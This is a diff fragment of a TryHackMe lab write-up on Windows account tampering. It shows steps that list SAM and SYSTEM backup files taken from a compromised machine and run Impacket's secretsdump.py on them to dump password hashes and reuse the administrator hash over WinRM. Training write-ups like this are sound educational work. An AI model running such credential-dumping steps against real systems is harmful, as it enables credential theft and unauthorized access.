JonmarCorpuz/Writeups/TryHackMe Module Task Writeups/Tampering With Unprivileged Accounts.md

 root@ip-10-10-72-227:~#
 ```
-15. `ls` to display the files and directories that are in our current working directory onto our terminal, which showed that the two backup files were indeed successfully downloaded onto our machine
+15. `ls` from our Linux attack machine to display the files and directories that are in our current working directory onto our terminal, which showed that the two backup files were indeed successfully downloaded onto our machine
 ```Bash
 root@ip-10-10-72-227:~# ls
 Desktop    Instructions  Postman  SAM.bak  SYSTEM.bak         Tools
 Downloads  Pictures      Rooms    Scripts  thinclient_drives  work
 ```
-16. `python3.9 /opt/impacket/examples/secretsdump.py -sam {FILENAME2}.bak -system {FILENAME1}.bak LOCAL` to dump the password hashes of all the users that are in the compromised machine from its SAM registry key that we backed up into a file into Impacket's **secretsdump.py** program (https://github.com/fortra/impacket/blob/master/examples/secretsdump.py), which was already installed on our AttackBox, using both backup files that we created on and retrieved from the compromised machine and output the results onto our terminal, which ended up outputting the compromised machine's administrator's password hash which we can then use to authenticate as the administrator when remotely connecting back to the compromised machine using WinRM
+16. `python3.9 /opt/impacket/examples/secretsdump.py -sam {FILENAME2}.bak -system {FILENAME1}.bak LOCAL` from our Linux attack machine to dump the password hashes of all the users that are in the compromised machine from its SAM registry key that we backed up into a file into Impacket's **secretsdump.py** program (https://github.com/fortra/impacket/blob/master/examples/secretsdump.py), which was already installed on our AttackBox, using both backup files that we created on and retrieved from the compromised machine and output the results onto our terminal, which ended up outputting the compromised machine's administrator's password hash which we can then use to authenticate as the administrator when remotely connecting back to the compromised machine using WinRM
 ```Bash
 root@ip-10-10-72-227:~# python3.9 /opt/impacket/examples/secretsdump.py -sam SAM.bak -system SYSTEM.bak LOCAL
 Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra